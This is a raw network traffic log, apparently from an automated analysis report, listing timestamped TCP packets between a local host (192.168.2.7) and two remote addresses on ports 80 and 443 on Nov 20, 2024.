                                                                                                                                                                                                Nov 20, 2024 10:54:36.505719900 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505829096 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505846024 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505861044 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505870104 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505887032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505899906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505904913 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505923986 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505940914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505950928 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.505951881 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506541967 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506556988 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506572008 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506598949 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506609917 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506616116 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506632090 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506633997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506643057 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506654024 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506690979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506705999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506716967 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506722927 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506741047 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506757021 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506767035 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506767035 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506773949 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506791115 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.506800890 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507606983 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507709026 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507725000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507735014 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507740974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507769108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507783890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507798910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507817030 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507817030 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507819891 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507837057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507848024 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507855892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507867098 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.507998943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508244038 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508260012 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508279085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508311033 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508321047 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508327961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508344889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508361101 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508368969 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508388996 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508485079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508502007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508517027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508528948 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508533955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508553028 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508568048 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508577108 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508585930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508645058 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.508645058 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510529041 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510559082 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510572910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510598898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510617018 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510627031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510632992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510659933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510662079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510680914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510698080 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510715008 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510718107 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510741949 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.510768890 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.521981955 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529586077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529642105 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529676914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529716015 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529721022 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529792070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529824972 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529829979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529860973 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529870033 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529907942 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529939890 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529944897 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.529980898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530008078 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530036926 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530078888 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530093908 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530102968 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530109882 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530128002 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530145884 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530150890 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530172110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530189037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530196905 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530208111 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530211926 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530224085 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530241013 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530256987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530265093 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530282021 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530282974 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530298948 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530302048 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530316114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530330896 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530340910 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530350924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530379057 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530575037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530621052 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530637026 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530695915 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530695915 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530702114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530718088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530734062 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530750036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530805111 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530805111 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530846119 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530863047 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530879974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530894995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530905962 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530910969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530930996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530945063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530953884 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530957937 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530972004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530991077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.530997038 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531127930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531579018 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531594992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531610012 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531635046 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531649113 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531665087 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531672001 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531685114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531692028 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531708956 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531774998 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531791925 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531806946 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531822920 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531837940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531847954 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531862974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531879902 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531887054 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531897068 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531913996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531919956 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.531932116 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532035112 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532524109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532541037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532572985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532588959 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532603979 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532617092 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532617092 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532622099 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532639027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532648087 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532741070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532756090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532768011 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532772064 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532792091 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532797098 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532809019 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532825947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532840967 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532850027 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532857895 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532876968 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532898903 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.532944918 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533422947 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533515930 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533591032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533607006 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533622980 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533638954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533647060 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533663988 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533682108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533689976 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533700943 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533718109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533724070 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533740997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533759117 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533771992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533776999 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533813000 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533915997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533934116 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533950090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533960104 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533970118 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533986092 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.533997059 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534003973 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534022093 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534028053 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534193993 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534487963 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534641981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534657955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534673929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534691095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534708977 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534723043 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534723043 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534729004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534753084 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534754992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534771919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534787893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534802914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534821033 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534837961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534847975 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534847975 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534854889 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534864902 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534878969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534898996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534904957 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.534970999 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536890030 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536916971 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536931992 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536948919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536964893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536981106 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536992073 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.536997080 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537018061 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537024021 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537024021 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537033081 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537050009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537055969 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537075996 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537092924 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537101984 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537108898 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537126064 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537134886 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537142038 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537159920 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537159920 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537180901 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.537205935 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.558290958 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:36.579606056 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.580097914 CET49832443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.580122948 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.580548048 CET49832443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.580555916 CET4434983213.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.591963053 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.592490911 CET49833443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:36.592523098 CET4434983313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:36.593166113 CET49833443192.168.2.713.107.246.45
